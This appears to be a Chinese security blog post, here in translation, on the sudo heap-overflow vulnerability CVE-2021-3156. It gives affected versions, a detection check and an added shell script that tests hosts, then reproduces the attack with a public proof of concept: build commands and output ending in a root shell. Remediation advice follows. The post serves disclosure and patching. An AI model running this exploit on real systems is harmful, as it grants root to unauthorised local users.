Vulnerability overview

When the sudo command is run with the -s or -i option, special characters in the command arguments are escaped with a backslash. When sudoedit is run with the -s or -i flag, however, that escaping does not actually take place, which can lead to a buffer overflow. As long as a sudoers file exists (usually /etc/sudoers), an attacker with an ordinary local user account can abuse sudo to obtain root privileges on the system.

Affected versions

Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1

Detection

As a non-root account, run the command sudoedit -s /
If the error response begins with "sudoedit:", the system is affected by this vulnerability; if the error response begins with "usage:", the vulnerability has already been patched.
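An added shell helper, not part of the original post, that automates the sudoedit -s / check above and additionally compares the version reported by sudo -V against the affected ranges listed in this post; the function names are this example's own assumptions.

```sh
#!/bin/sh
# Added helper, not part of the original post: automates the detection
# procedure (sudoedit -s / probe) and compares the `sudo -V` version string
# against the affected ranges. Function names are this example's own.

# Classify the first line of sudoedit's error output as the post describes.
classify_sudoedit_output() {
  case "$1" in
    sudoedit:*) echo vulnerable ;;   # unpatched: option combination accepted
    usage:*)    echo patched ;;      # patched: option combination rejected
    *)          echo unknown ;;
  esac
}

# Turn "1.8.31p2" into a comparable integer (major, minor, patch, p-level).
version_key() {
  base=${1%%p*}
  p=${1#"$base"}; p=${p#p}; [ -n "$p" ] || p=0
  major=${base%%.*}; rest=${base#*.}
  minor=${rest%%.*}; patch=${rest#*.}
  [ "$patch" = "$rest" ] && patch=0
  echo $(( major * 1000000 + minor * 10000 + patch * 100 + p ))
}

# Affected ranges from this post: 1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1.
version_affected() {
  k=$(version_key "$1")
  [ "$k" -ge "$(version_key 1.8.2)" ] && [ "$k" -le "$(version_key 1.8.31p2)" ] && return 0
  [ "$k" -ge "$(version_key 1.9.0)" ] && [ "$k" -le "$(version_key 1.9.5p1)" ] && return 0
  return 1
}

# Live check, to be run as an unprivileged user on the host under review.
# stdin is closed so a password prompt cannot block the script.
probe_host() {
  v=$(sudo -V 2>/dev/null | sed -n 's/^Sudo version //p')
  msg=$(sudoedit -s / 2>&1 </dev/null | head -n 1)
  if version_affected "$v"; then vstate=affected; else vstate=not-affected; fi
  echo "sudo $v: version range=$vstate, sudoedit probe=$(classify_sudoedit_output "$msg")"
}

# Run the live probe only when explicitly asked: ./check.sh --probe
if [ "${1-}" = "--probe" ]; then probe_host; fi
```

Treat the sudoedit probe as the authoritative result: distributions that backport the fix without changing the version string will show as "affected" by the version check but "patched" by the probe.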

PoC location

https://github.com/blasty/CVE-2021-3156

Reproduction

Commands:

git clone https://github.com/blasty/CVE-2021-3156.git

正克隆到 'CVE-2021-3156'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 24 (delta 10), reused 19 (delta 6), pack-reused 0
展开对象中: 100% (24/24), 完成.

cd CVE-2021-3156/
make

rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <[email protected]>
usage: ./sudo-hax-me-a-sandwich
available targets:
------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
------------------------------------------------------------

sudo -V

Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <[email protected]>
using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27'
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
sh-4.4# whoami
root
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)

Remediation

Upgrade sudo to the latest version without delay.
Download link:
https://www.sudo.ws/dist/

References:
https://www.cnblogs.com/thelostworld/p/14351906.html
https://www.venustech.com.cn/new_type/aqtg/20210127/22339.html

Last modified: 4 June 2021, 09:37 AM